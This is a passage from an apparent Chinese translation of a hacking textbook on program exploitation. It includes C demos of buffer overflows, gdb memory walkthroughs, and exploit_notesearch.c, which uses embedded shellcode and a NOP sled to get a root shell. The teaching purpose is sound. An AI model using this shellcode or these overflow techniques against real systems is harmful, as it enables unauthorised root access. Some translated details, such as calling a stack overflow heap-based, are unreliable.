               wager_two = take_wager(player.credits, wager_one);
         }
      if(choice_two == 'c') {    // Change pick.
         i = invalid_choice = 0; // Valid choice
         while(i == pick || cards[i] == 'Q') // Loop until the other card
            i++;                             // is found,
         pick = i;                           // and then swap pick.
         printf("Your card pick has been changed to card %d\n", pick+1);
      }
   }

   for(i=0; i < 3; i++) {  // Reveal all of the cards.
      if(ace == i)
         cards[i] = 'A';
      else
         cards[i] = 'Q';
   }
   print_cards("End result", cards, pick);

   if(pick == ace) {  // Handle win.
      printf("You have won %d credits from your first wager\n", wager_one);
      player.credits += wager_one;
      if(wager_two != -1) {
         printf("and an additional %d credits from your second wager!\n", wager_two);
         player.credits += wager_two;
      }
   } else { // Handle loss.
      printf("You have lost %d credits from your first wager\n", wager_one);
      player.credits -= wager_one;
      if(wager_two != -1) {
         printf("and an additional %d credits from your second wager!\n", wager_two);
         player.credits -= wager_two;
      }
   }
   return 0; 
}

由于这是一个多用户程序，它会在 /var 目录下写入文件，因此它必须是 suid root。

reader@hacking:~/booksrc $ gcc -o game_of_chance game_of_chance.c 
reader@hacking:~/booksrc $ sudo chown root:root ./game_of_chance
reader@hacking:~/booksrc $ sudo chmod u+s ./game_of_chance
reader@hacking:~/booksrc $ ./game_of_chance
-=-={ New Player Registration }=-=-
Enter your name: Jon Erickson

Welcome to the Game of Chance, Jon Erickson.
You have been given 100 credits.
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 100 credits] ->  1

[DEBUG] current_game pointer @ 0x08048e6e

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: 7
The winning number is 14.
Sorry, you didn't win.

You now have 90 credits.
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 90 credits] ->  2

[DEBUG] current_game pointer @ 0x08048f61

::::::: No Match Dealer :::::::
In this game you can wager up to all of your credits.
The dealer will deal out 16 random numbers between 0 and 99.
If there are no matches among them, you double your money!

How many of your 90 credits would you like to wager?  30
                ::: Dealing out 16 random numbers :::
88      68      82      51      21      73      80      50
11      64      78      85      39      42      40      95
There were no matches! You win 30 credits!

You now have 120 credits
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 120 credits] ->  3

[DEBUG] current_game pointer @ 0x0804914c
******* Find the Ace *******
In this game you can wager up to all of your credits.
Three cards will be dealt: two queens and one ace.
If you find the ace, you will win your wager.
After choosing a card, one of the queens will be revealed.
At this point you may either select a different card or
increase your wager.

How many of your 120 credits would you like to wager?  50

        *** Dealing cards ***
        ._.     ._.     ._.
Cards:  |X|     |X|     |X|
         1       2       3
Select a card: 1, 2, or 3:  2

        *** Revealing a queen ***
        ._.     ._.     ._.
Cards:  |X|     |X|     |Q|
                 ^-- your pick
Would you like to
[c]hange your pick      or      [i]ncrease your wager?
Select c or i:  c
Your card pick has been changed to card 1.

        *** End result ***

        ._.     ._.     ._.
Cards:  |A|     |Q|     |Q|
         ^-- your pick
You have won 50 credits from your first wager.

You now have 170 credits.
Would you like to play again? (y/n)  n
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] ->  4

====================| HIGH SCORE |====================
You currently have the high score of 170 credits!
======================================================

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 170 credits] ->  7

Thanks for playing! Bye.
reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ ./game_of_chance
-=-={ New Player Registration }=-=-
Enter your name: Jose Ronnick

Welcome to the Game of Chance Jose Ronnick.
You have been given 100 credits.
-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score 5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] ->  4
====================| HIGH SCORE |====================
Jon Erickson has the high score of 170.
======================================================

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your username
6 - Reset your account at 100 credits
7 - Quit
[Name: Jose Ronnick]
[You have 100 credits] ->  7

Thanks for playing! Bye.
jose@hacking:~/booksrc $ exit
exit 
reader@hacking:~/booksrc $

试着玩一下这个程序。找到 A 约游戏是一个条件概率原理的演示；尽管它不符合直觉，但改变你的选择将增加你找到 A 约的概率从 33% 提高到 50%。许多人难以理解这个真理——这就是为什么它不符合直觉。黑客的秘密在于理解这样的小众真理，并利用它们产生看似神奇的结果。

第 0x300 章。利用

程序利用是黑客攻击的基石。正如前一章所展示的，一个程序由一系列复杂的规则组成，遵循一定的执行流程，最终告诉计算机做什么。利用程序就是以巧妙的方式让计算机做你想让它做的事，即使当前运行的程序被设计成防止这种操作。由于程序实际上只能做它被设计去做的事，因此安全漏洞实际上是程序或程序运行环境的缺陷或疏忽。需要具有创造性的思维来发现这些漏洞并编写补偿这些漏洞的程序。有时这些漏洞是相对明显的程序员错误的结果，但也有一些不太明显的错误产生了更复杂的利用技术，这些技术可以应用于许多不同的地方。

程序只能按照其编程去做，字面意思。不幸的是，写下的内容并不总是与程序员希望程序去做的事情相一致。这个原则可以用一个笑话来解释：

一个男人正在穿过森林，他发现地上有一个魔法灯。出于本能，他拿起灯，用袖子擦了擦它的侧面，一个精灵突然出现。精灵感谢那个人释放了他，并承诺给他三个愿望。那个人欣喜若狂，确切地知道他想要什么。

“首先，”那个人说，“我想得到十亿美元。”

灵魂摆动手指，一个装满钱的公文包从空中出现。

那个人惊讶地睁大了眼睛，继续说：“接下来，我要一辆法拉利。”

灵魂摆动手指，一辆法拉利从烟雾中冒了出来。

那个人继续说：“最后，我想对女人有不可抗拒的吸引力。”

灵魂摆动手指，那个人变成了一个巧克力盒子。

正如一个人的最终愿望是基于他说的话而不是他的想法而得到满足一样，一个程序会严格按照其指令执行，结果并不总是程序员所期望的。有时，后果可能是灾难性的。

程序员也是人，有时他们写的代码并不完全符合他们的意图。例如，一种常见的编程错误被称为差一错误。正如其名所示，这是一种程序员多计算了一个的错误。这种情况比你想的更常见，而且最好用一个问题来解释：如果你正在建造一个 100 英尺的栅栏，栅栏柱之间的距离是 10 英尺，你需要多少个栅栏柱？显然的答案是 10 个栅栏柱，但这是不正确的，因为你实际上需要 11 个。这种类型的“差一”错误通常被称为栅栏错误，它发生在程序员错误地计算项目数量而不是项目之间的空间，或者反之亦然。另一个例子是当程序员试图选择一个用于处理的数字或项目范围时，例如处理项目N到M。如果N = 5和M = 17，需要处理多少个项目？显然的答案是M - N，即17 - 5 = 12个项目。但这是不正确的，因为实际上有M - N + 1个项目，总共是13个项目。这种看似反直觉的情况正是这些错误发生的原因。

通常，栅栏错误会被忽视，因为程序并没有针对每一种可能性进行测试，而且栅栏错误的效果通常在正常程序执行期间不会出现。然而，当程序接收到使错误效果显现的输入时，错误的后果可能会对程序逻辑的其他部分产生连锁反应。当被适当利用时，一个“差一”错误可以使看似安全的程序变成安全漏洞。

一个经典的例子是 OpenSSH，它本应是一个安全的终端通信程序套件，旨在取代不安全且未加密的服务，如 telnet、rsh 和 rcp。然而，在通道分配代码中存在一个“差一”错误，并被大量利用。具体来说，代码中包含了一个 if 语句，其内容如下：

if (id <: 0 || id > channels_alloc) {

它应该是

if (id < 0 || id >= channels_alloc) {

用通俗易懂的话来说，这段代码的读法是如果 ID 小于 0 或者 ID 大于分配的通道数，执行以下操作，而它本应该是如果 ID 小于 0 或者 ID 大于或等于分配的通道数，执行以下操作。

这个简单的“差一”错误允许进一步利用程序，以至于一个正常用户在验证和登录后能够获得对系统的完全管理权限。这种功能显然不是程序员为像 OpenSSH 这样的安全程序所期望的，但计算机只能做它被告诉的事情。

另一种似乎会滋生可利用的程序员错误的情况是，当程序被快速修改以扩展其功能时。虽然这种功能增加使得程序更具市场吸引力并提高了其价值，但它也增加了程序的复杂性，从而增加了疏忽的可能性。微软的 IIS 网络服务器程序旨在向用户提供服务静态和交互式网络内容。为了实现这一点，程序必须允许用户在特定目录内读取、写入和执行程序和文件；然而，这种功能必须限制在这些特定目录内。如果没有这种限制，用户将完全控制系统，这显然从安全角度来看是不理想的。为了防止这种情况，程序设计了路径检查代码，旨在防止用户使用反斜杠字符在目录树中向后遍历并进入其他目录。

尽管增加了对 Unicode 字符集的支持，但程序的复杂性仍然持续增加。Unicode是一种双字节字符集，旨在为包括中文和阿拉伯语在内的每一种语言提供字符。通过为每个字符使用两个字节而不是一个字节，Unicode 允许有数万个可能的字符，相比之下，单字节字符只能允许几百个字符。这种额外的复杂性意味着现在存在多个反斜杠字符的表示形式。例如，在 Unicode 中%5c翻译为反斜杠字符，但这种翻译是在路径检查代码运行之后完成的。因此，使用%5c而不是\，确实可以遍历目录，从而允许上述安全风险。Sadmind 蠕虫和 CodeRed 蠕虫就是利用这种 Unicode 转换疏忽来篡改网页的。

这个法律条文原则在计算机编程领域之外的另一个相关例子是拉马奇亚漏洞。就像计算机程序的规则一样，美国的法律体系有时会有一些规则并没有明确说明其创造者的意图，就像计算机程序漏洞一样，这些法律漏洞可以被用来规避法律的意图。1993 年底，一个名叫大卫·拉马奇亚的 21 岁计算机黑客和麻省理工学院的学生建立了一个名为 Cynosure 的公告板系统，用于软件盗版。那些有软件要分享的人会上传，而那些想要软件的人会下载。这个服务只在线大约六周，但产生了全球范围内的巨大网络流量，最终引起了大学和联邦当局的注意。软件公司声称由于 Cynosure，他们损失了一百万美元，联邦大陪审团指控拉马奇亚犯有一项与未知人员合谋违反电信诈骗法的罪行。然而，指控被撤销，因为拉马奇亚被指控的行为并不构成《版权法》下的犯罪行为，因为侵权不是为了商业利益或私人财务收益。显然，立法者从未预料到有人可能会出于除个人财务收益以外的动机从事这些活动。（国会于 1997 年通过《无电子盗窃法》关闭了这个漏洞。）尽管这个例子并不涉及利用计算机程序，但法官和法院可以被视为执行法律体系程序的计算机。黑客的抽象概念超越了计算，可以应用于涉及复杂系统的许多其他生活方面。

通用利用技术

离差一的错误和不正确的 Unicode 扩展都是当时可能难以察觉但事后任何程序员都会明显察觉到的错误。然而，有一些常见的错误可以通过不明显的方式被利用。这些错误对安全性的影响并不总是显而易见，这些安全问题在代码的各个地方都有发现。由于相同的错误在许多不同的地方都会发生，因此已经发展出通用的利用技术来利用这些错误，并且它们可以在各种情况下使用。

大多数程序漏洞都与内存损坏有关。这包括常见的漏洞利用技术，如缓冲区溢出，以及不太常见的格式化字符串漏洞等。使用这些技术，最终目标是通过对目标程序执行流程进行欺骗，使其运行已偷偷运入内存的恶意代码，从而控制目标程序的执行流程。这种进程劫持过程被称为任意代码执行，因为黑客可以迫使程序执行几乎任何他们想要的事情。像 LaMacchia 漏洞一样，这类漏洞存在是因为程序无法处理特定的意外情况。在正常情况下，这些意外情况会导致程序崩溃——比喻地说，将执行流程推下悬崖。但如果环境被仔细控制，执行流程可以被控制——防止崩溃并重新编程进程。

缓冲区溢出

缓冲区溢出漏洞自计算机的早期就已经存在，并且至今仍然存在。大多数网络蠕虫都使用缓冲区溢出漏洞进行传播，甚至最近在 Internet Explorer 中发现的零日 VML 漏洞也是由于缓冲区溢出。

C 是一种高级编程语言，但它假定程序员负责数据完整性。如果这种责任转移到编译器，生成的二进制文件会显著变慢，因为每个变量都需要进行完整性检查。此外，这也会从程序员手中移走相当一部分控制权，并使语言变得复杂。

虽然 C 语言的简洁性增加了程序员的控制力以及生成程序的效率，但它也可能导致程序员不小心编写出易受缓冲区溢出和内存泄漏影响的程序。这意味着一旦变量分配了内存，就没有内置的安全措施来确保变量的内容适合分配的内存空间。如果一个程序员想要将十个字节的数据放入只分配了八个字节空间的缓冲区中，这种操作是被允许的，尽管它很可能会使程序崩溃。这种情况被称为缓冲区溢出或缓冲区越界，因为额外的两个字节数据会溢出并从分配的内存中溢出，覆盖任何随后发生的内容。如果关键数据被覆盖，程序将崩溃。overflow_example.c 代码提供了一个示例。

缓冲区溢出

overflow_example.c

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
   int value = 5;
   char buffer_one[8], buffer_two[8];

   strcpy(buffer_one, "one"); /* Put "one" into buffer_one. */
   strcpy(buffer_two, "two"); /* Put "two" into buffer_two. */

   printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
   printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
   printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

   printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));
   strcpy(buffer_two, argv[1]); /* Copy first argument into buffer_two. */

   printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);
   printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);
   printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value); 
}

到现在为止，你应该能够阅读上面的源代码并弄清楚程序的功能。在下面的示例输出中进行编译后，我们尝试将十个字节从第一个命令行参数复制到只有八个字节分配的buffer_two中。

reader@hacking:~/booksrc $ gcc -o overflow_example overflow_example.c 
reader@hacking:~/booksrc $ ./overflow_example 1234567890
[BEFORE] buffer_two is at 0xbffff7f0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7f8 and contains 'one'
[BEFORE] value is at 0xbffff804 and is 5 (0x00000005)

[STRCPY] copying 10 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7f0 and contains '1234567890'
[AFTER] buffer_one is at 0xbffff7f8 and contains '90'
[AFTER] value is at 0xbffff804 and is 5 (0x00000005)
reader@hacking:~/booksrc $

注意，buffer_one在内存中直接位于buffer_two之后，因此当将十个字节复制到buffer_two时，最后的两个字节90会溢出到buffer_one并覆盖掉原来的内容。

较大的缓冲区自然会溢出到其他变量中，但如果使用足够大的缓冲区，程序将崩溃并死亡。

reader@hacking:~/booksrc $ ./overflow_example AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 29 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

这类程序崩溃相当常见——想想看有多少次程序在你面前崩溃或蓝屏。程序员的错误是遗漏——应该有长度检查或对用户提供的输入进行限制。这类错误很容易犯，并且很难发现。实际上，notesearch.c 程序中就包含一个缓冲区溢出漏洞。即使你已经熟悉 C 语言，你可能直到现在才注意到这一点。

reader@hacking:~/booksrc $ ./notesearch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

程序崩溃很烦人，但在黑客手中，它们可能变得非常危险。一个知识渊博的黑客可以在程序崩溃时控制程序，并产生一些令人惊讶的结果。exploit_notesearch.c 代码展示了这种危险。

exploit_notesearch.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // Zero out the new memory.

   strcpy(command, "./notesearch \'"); // Start command buffer.
   buffer = command + strlen(command); // Set buffer at the end.

   if(argc > 1) // Set offset.
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // Set return address.

   for(i=0; i < 160; i+=4) // Fill buffer with return address.
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // Build NOP sled.
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");

   system(command); // Run exploit.
   free(command);
}

这个漏洞的源代码将在稍后进行深入解释，但总的来说，它只是生成一个命令字符串，该字符串将在单引号之间执行 notesearch 程序，并带有命令行参数。它使用字符串函数来完成这个任务：strlen()获取当前字符串的长度（以定位缓冲区指针）和strcat()将结尾的单引号连接到末尾。最后，使用系统函数执行命令字符串。单引号之间的缓冲区是漏洞的真正核心。其余的只是将这种数据毒药传递出去的方法。看看一个可控的崩溃能做什么。

reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3.2#

该漏洞能够利用溢出提供一个 root shell——提供对计算机的完全控制。这是一个基于堆的缓冲区溢出漏洞的例子。

基于堆的缓冲区溢出漏洞

notesearch 漏洞通过破坏内存来控制执行流程。auth_overflow.c 程序展示了这一概念。

auth_overflow.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
   int auth_flag = 0;
   char password_buffer[16];

   strcpy(password_buffer, password);

   if(strcmp(password_buffer, "brillig") == 0)
      auth_flag = 1;
   if(strcmp(password_buffer, "outgrabe") == 0)
      auth_flag = 1;

   return auth_flag;
}

int main(int argc, char *argv[]) {
   if(argc < 2) {
      printf("Usage: %s <password>\n", argv[0]);
      exit(0);
   }
   if(check_authentication(argv[1])) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
      printf("      Access Granted.\n");
      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
   } else {
      printf("\nAccess Denied.\n");
   }
}

这个示例程序接受一个密码作为其唯一的命令行参数，然后调用一个check_authentication()函数。这个函数允许两个密码，旨在代表多种认证方法。如果使用这两个密码中的任何一个，函数返回 1，从而允许访问。你应该能够在编译之前通过查看源代码来理解大部分内容。不过，在编译时请使用-g选项，因为我们稍后将对这个程序进行调试。

reader@hacking:~/booksrc $ gcc -g -o auth_overflow auth_overflow.c
reader@hacking:~/booksrc $ ./auth_overflow
Usage: ./auth_overflow <password>
reader@hacking:~/booksrc $ ./auth_overflow test

Access Denied.
reader@hacking:~/booksrc $ ./auth_overflow brillig

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $ ./auth_overflow outgrabe

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $

到目前为止，一切如源代码所述正常工作。对于像计算机程序这样确定性的东西来说，这是可以预料的。但是溢出可能导致意外甚至矛盾的行为，允许在没有正确密码的情况下访问。

reader@hacking:~/booksrc $ ./auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
reader@hacking:~/booksrc $

你可能已经猜到了发生了什么，但让我们用调试器来看一下它的具体细节。

reader@hacking:~/booksrc $ gdb -q ./auth_overflow
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4
5       int check_authentication(char *password) {
6               int auth_flag = 0;
7               char password_buffer[16];
8
`9`                strcpy(password_buffer, password);
10
(gdb)
11              if(strcmp(password_buffer, "brillig") == 0)
12                      auth_flag = 1;
13              if(strcmp(password_buffer, "outgrabe") == 0)
14                      auth_flag = 1;
15
`16`              return auth_flag;
17      }
18
19      int main(int argc, char *argv[]) {
20              if(argc < 2) {
(gdb) break 9
Breakpoint 1 at 0x8048421: file auth_overflow.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x804846f: file auth_overflow.c, line 16.
(gdb)

使用-q选项启动 GDB 调试器以抑制欢迎横幅，并在第 9 行和第 16 行设置断点。当程序运行时，执行将在这些断点处暂停，给我们一个检查内存的机会。

(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/auth_overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at
auth_overflow.c:9
9               strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7a0:      ")????o??????)\205\004\b?o??p???????"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) print 0xbffff7bc - 0xbffff7a0
$1 = 28
(gdb) x/16xw password_buffer
0xbffff7a0:     0xb7f9f729      0xb7fd6ff4      0xbffff7d8      0x08048529
0xbffff7b0:     0xb7fd6ff4      0xbffff870      0xbffff7d8      0x00000000
0xbffff7c0:     0xb7ff47b0      0x08048510      0xbffff7d8      0x080484bb
0xbffff7d0:     0xbffff9af      0x08048510      0xbffff838      0xb7eafebc
(gdb)

第一个断点出现在strcpy()函数执行之前。通过检查password_buffer指针，调试器显示它被填充了随机的未初始化数据，并且位于内存中的0xbffff7a0地址。通过检查auth_flag变量的地址，我们可以看到它在0xbffff7bc的位置，其值为 0。使用打印命令可以进行算术运算，并显示auth_flag位于password_buffer起始点之后 28 个字节。这种关系也可以在以password_buffer开始的内存块中看到。auth_flag的位置用粗体表示。

(gdb) continue
Continuing.

Breakpoint 2, check_authentication (password=0xbffff9af 'A' <repeats 30 times>) at
auth_overflow.c:16
16              return auth_flag;
(gdb) x/s password_buffer
0xbffff7a0:      'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc:     0x00004141
(gdb) x/16xw password_buffer
0xbffff7a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7b0:     0x41414141      0x41414141      0x41414141      0x00004141
0xbffff7c0:     0xb7ff47b0      0x08048510      0xbffff7d8      0x080484bb
0xbffff7d0:     0xbffff9af      0x08048510      0xbffff838      0xb7eafebc
(gdb) x/4cb &auth_flag
0xbffff7bc:     65 'A'  65 'A'  0 '\0'  0 '\0'
(gdb) x/dw &auth_flag
0xbffff7bc:     16705
(gdb)

继续到strcpy()之后找到的下一个断点，再次检查这些内存位置。password_buffer溢出到auth_flag，将其前两个字节改为0x41。0x00004141的值可能看起来又向后了，但请记住，x86 是小端架构，所以它应该是这样的。如果你单独检查这四个字节中的每一个，你可以看到内存的实际布局。最终，程序将把这个值当作一个整数，其值为 16705。

(gdb) continue
Continuing.

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-

Program exited with code 034.
(gdb)

在溢出之后，check_authentication()函数将返回 16705 而不是 0。由于 if 语句将任何非零值视为已认证，程序的执行流程将控制到认证部分。在这个例子中，auth_flag变量是执行控制点，因为覆盖这个值是控制来源。

但这是一个非常人为的例子，它依赖于变量的内存布局。在auth_overflow2.c中，变量是按相反顺序声明的。（对auth_overflow.c的更改用粗体表示。）

`auth_overflow2.c`

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
   `char password_buffer[16];    int auth_flag = 0;`

   strcpy(password_buffer, password);

   if(strcmp(password_buffer, "brillig") == 0)
      auth_flag = 1;
   if(strcmp(password_buffer, "outgrabe") == 0)
      auth_flag = 1;

   return auth_flag;
}

int main(int argc, char *argv[]) {
   if(argc < 2) {
      printf("Usage: %s <password>\n", argv[0]);
      exit(0);
   }
   if(check_authentication(argv[1])) {
      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
      printf("      Access Granted.\n");
      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
   } else {
      printf("\nAccess Denied.\n");
   }
}

这个简单的更改将auth_flag变量放在内存中的password_buffer之前。这消除了使用return_value变量作为执行控制点的需要，因为它不能再被溢出所破坏。

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4
5       int check_authentication(char *password) {
6               char password_buffer[16];
7               int auth_flag = 0;
8
9               strcpy(password_buffer, password);
10
(gdb)
11              if(strcmp(password_buffer, "brillig") == 0)
12                      auth_flag = 1;
13              if(strcmp(password_buffer, "outgrabe") == 0)
14                      auth_flag = 1;
15
16              return auth_flag;
17      }
18
19      int main(int argc, char *argv[]) {
20              if(argc < 2) {
(gdb) break 9
Breakpoint 1 at 0x8048421: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 2 at 0x804846f: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at
auth_overflow2.c:9
9               strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff7c0:      "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\
bH???????\002"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) x/16xw &auth_flag
0xbffff7bc:     `0x00000000`      0xb7fd6ff4      0xbffff880      0xbffff7e8
0xbffff7cc:     0xb7fd6ff4      0xb7ff47b0      0x08048510      0xbffff7e8
0xbffff7dc:     0x080484bb      0xbffff9b7      0x08048510      0xbffff848
0xbffff7ec:     0xb7eafebc      0x00000002      0xbffff874      0xbffff880 
(gdb)

设置类似的断点，并检查内存，显示auth_flag（上面和下面都用粗体表示）在内存中位于password_buffer之前。这意味着auth_flag永远不会被password_buffer中的溢出覆盖。

(gdb) cont
Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
    at auth_overflow2.c:16
16              return auth_flag;
(gdb) x/s password_buffer
0xbffff7c0:      'A' <repeats 30 times>
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb) x/16xw &auth_flag
0xbffff7bc:     `0x00000000`      0x41414141      0x41414141      0x41414141
0xbffff7cc:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7dc:     0x08004141      0xbffff9b7      0x08048510      0xbffff848
0xbffff7ec:     0xb7eafebc      0x00000002      0xbffff874      0xbffff880 
(gdb)

如预期的那样，溢出不会干扰auth_flag变量，因为它位于缓冲区之前。但确实存在另一个执行控制点，尽管你无法在 C 代码中看到它。它方便地位于所有栈变量之后，因此可以很容易地被覆盖。这种内存对于所有程序的操作都是至关重要的，因此它存在于所有程序中，当它被覆盖时，通常会导致程序崩溃。

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb)

从上一章回顾，堆栈是程序使用的五个内存段之一。堆栈是一种 FILO（先进后出）数据结构，用于在函数调用期间维护局部变量的执行流程和上下文。当一个函数被调用时，一个称为栈帧的结构会被推入堆栈，并且 EIP 寄存器跳转到函数的第一个指令。每个栈帧包含该函数的局部变量以及一个返回地址，以便 EIP 能够恢复。当函数执行完毕后，栈帧从堆栈中弹出，并使用返回地址来恢复 EIP。所有这些功能都是架构内建的，通常由编译器处理，而不是程序员。

当调用check_authentication()函数时，一个新的栈帧会被推入main()函数栈帧之上。在这个栈帧中包含局部变量、返回地址以及函数的参数。

我们可以在调试器中看到所有这些元素。

图 0x300-1.

reader@hacking:~/booksrc $ gcc -g auth_overflow2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4
5       int check_authentication(char *password) {
6               char password_buffer[16];
7               int auth_flag = 0;
8
9               strcpy(password_buffer, password);
10
(gdb)
11              if(strcmp(password_buffer, "brillig") == 0)
12                      auth_flag = 1;
13              if(strcmp(password_buffer, "outgrabe") == 0)
14                      auth_flag = 1;
15
16              return auth_flag;
17      }
18
19      int main(int argc, char *argv[]) {
20              if(argc < 2) {
(gdb)
21                      printf("Usage: %s <password>\n", argv[0]);
22                      exit(0);
23              }
24              if(check_authentication(argv[1])) {
25                      printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
26                      printf("      Access Granted.\n");
27                      printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
28              } else {
29                      printf("\nAccess Denied.\n");
30         }
(gdb) break 24
Breakpoint 1 at 0x80484ab: file auth_overflow2.c, line 24.
